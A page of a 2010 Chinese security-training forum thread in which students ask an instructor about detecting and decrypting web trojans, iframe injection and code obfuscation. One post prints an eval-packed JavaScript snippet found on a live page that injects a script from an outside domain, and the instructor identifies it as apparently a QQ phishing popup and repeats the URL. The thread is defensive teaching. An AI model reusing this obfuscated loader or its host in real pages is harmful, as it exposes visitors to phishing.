1234   3  /  4  页   跳转

[讲义] 2010年7月15日:网马解密-讲义

收藏
本主题由 版主 狮子座小皮 于 2010-7-16 9:32:00 执行 主题置顶/取消 操作
nevergu
头像
拙长孩提狮
  • 帖子:370
  • 注册: 2010-06-22
  • 来自:
发表于: 2010-07-15 11:25 | 短消息 资料
字号: 21楼

回复:2010年7月15日:网马解密-讲义

老师请问一下!
我们平时查看html的时候,是不能直接在里面修改html的,那我们用网页解密工具preshow查到网码的时候,发现了有攻击的挂马,我们修改完后,可以放回和替换原来网址的html吗?

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复:

客户端是无法修改服务器端的数据的,网马清除所有操作都是在服务器端,需要网站站长或网站管理员来操作。
最后编辑networkedition 最后编辑于 2010-07-15 15:19:31
I WILL NEVER GIVE UP!
AND WORKHARD EVERYDAY!!
gototop
 
nevergu
头像
拙长孩提狮
  • 帖子:370
  • 注册: 2010-06-22
  • 来自:
发表于: 2010-07-15 11:26 | 短消息 资料
字号: 22楼

回复:2010年7月15日:网马解密-讲义

老师请问一下!
为什么我在正常的URL后面随便加一些后缀后运行网址,为什么不提示【不存在你输入的网页地址】,而是又跳回原来的地址呢,在html中那块是实现这个功能的。

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复:

有容错吧,我个人理解是网站有些网站会判断客户端提交的参数(数据),如遇到一些非法的参数会直接跳转到首页,程序会认为客户端提交的参数存在有恶意行为。
最后编辑networkedition 最后编辑于 2010-07-15 15:22:33
I WILL NEVER GIVE UP!
AND WORKHARD EVERYDAY!!
gototop
 
雷雨声
头像
初生襁褓狮
  • 帖子:122
  • 注册: 2010-05-25
  • 来自:
就爱不长大
发表于: 2010-07-15 11:38 | 短消息 资料
字号: 23楼

回复:2010年7月15日:网马解密-讲义

老师好,好像听说过一种什么方式,能禁用掉iframe,框架挂马也就没用了?
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复:

除非你不使用框架吧,iframe是最常见的挂马形式,当然还有其它形式的。
最后编辑networkedition 最后编辑于 2010-07-15 15:23:52
~~~When I get older, I'll be stronger, Just like a wavin' flag~~~
gototop
 
nevergu
头像
拙长孩提狮
  • 帖子:370
  • 注册: 2010-06-22
  • 来自:
发表于: 2010-07-15 11:39 | 短消息 资料
字号: 24楼

回复:2010年7月15日:网马解密-讲义

老师我觉得网码解密和日记分析一样都是要靠平时的积累和学习。
想问一下一般网码分析工具在解密的时候也是一行一行的扫描出结果来的,难道一些人在编译挂网的时候不会有什么办法来隐藏自己的挂马吗?
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复:

编写网马解密工具的人,是针对分析网马的特性来进行编写的,例如:freshow的filter直接可以将网站源代码中的iframe、js等过滤出来,这样就大大降低了人工来看代码,一个一个将链接摘抄出来。当然工具也不是万能的。你说的隐藏代码实际上可以理解为加密,实际上最初的网站代码加密是用来防止其它网站抄袭代码,后来被逐渐引入到了网页挂马。
最后编辑networkedition 最后编辑于 2010-07-15 15:29:19
I WILL NEVER GIVE UP!
AND WORKHARD EVERYDAY!!
gototop
 
nevergu
头像
拙长孩提狮
  • 帖子:370
  • 注册: 2010-06-22
  • 来自:
发表于: 2010-07-15 11:43 | 短消息 资料
字号: 25楼

回复:2010年7月15日:网马解密-讲义

老师下面的图形中的绿点是表示对应的文档出现问题的地方吗?


 附件: 您所在的用户组无法下载或查看附件

★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为networkedition回复:
这些绿点没有什么意义吧。
最后编辑networkedition 最后编辑于 2010-07-15 15:30:45
I WILL NEVER GIVE UP!
AND WORKHARD EVERYDAY!!
gototop
 
shenxx1989
头像
拙长孩提狮
  • 帖子:88
  • 注册: 2009-01-20
  • 来自:
发表于: 2010-07-15 12:43 | 短消息 资料
字号: 26楼

回复:2010年7月15日:网马解密-讲义

今天的看得我一个头两个大啊。。。

先慢慢琢磨去了。。。

老师那些代码特征码之类的是不是只有在实践中逐渐积累了?
对于我们这些初次接触的人来说有点不知所措了。。。
ToT。。。
gototop
 
jj1234567
头像
初生襁褓狮
  • 帖子:112
  • 注册: 2010-05-25
  • 来自:
发表于: 2010-07-15 13:15 | 短消息 资料
字号: 27楼

回复:2010年7月15日:网马解密-讲义

学习~ 谢谢老师!
请问讲义中常见网页挂马方式第5点和第11点有没有区别,是相同的么?
最后编辑jj1234567 最后编辑于 2010-07-15 13:23:58
gototop
 
西南偏南
头像
初生襁褓狮
  • 帖子:218
  • 注册: 2010-06-09
  • 来自:籍贯河北 现居成都
发表于: 2010-07-15 13:44 | 短消息 资料
字号: 28楼

回复:2010年7月15日:网马解密-讲义

在看教程
一闪一闪亮晶晶,漫天都是小星星
gototop
 
在校学生
头像
初生襁褓狮
  • 帖子:70
  • 注册: 2010-03-09
  • 来自:
发表于: 2010-07-15 13:55 | 短消息 资料
字号: 29楼

回复:2010年7月15日:网马解密-讲义

老师,在浏览网页的时间,我发现一个网页也被拦截,后查看代码,在head和body之间的代码如下:
<Script language="javascript">
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b.a(\'<9 8="7://6.5.4/3/0/2.0"></1>\');',12,12,'js|script|dtree|web|com|qqcn2010|www|http|src|SCRIPT|write|document'.split('|'),0,{}))
-->
</Script>
请问下老师这是不是个QQ钓鱼的代码!谢谢老师
★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★ ★★★★★

以下为 networkedition回复:

不错呀,你都学会找eval加密了。解密出是个js,大概看了一下代码,ms是qq钓鱼弹窗之类的。

http://www.qqcn2010.com/web/js/dtree.js
最后编辑networkedition 最后编辑于 2010-07-15 15:35:29
gototop
 
cherish77
头像
健康舞勺狮
  • 帖子:300
  • 注册: 2010-06-22
  • 来自:
实习生小红花
发表于: 2010-07-15 14:03 | 短消息 资料
字号: 30楼

回复:2010年7月15日:网马解密-讲义

来上课啦~~~
gototop
 
<<上一主题|下一主题>>
1234   3  /  4  页   跳转
页面顶部
Powered by Discuz!NT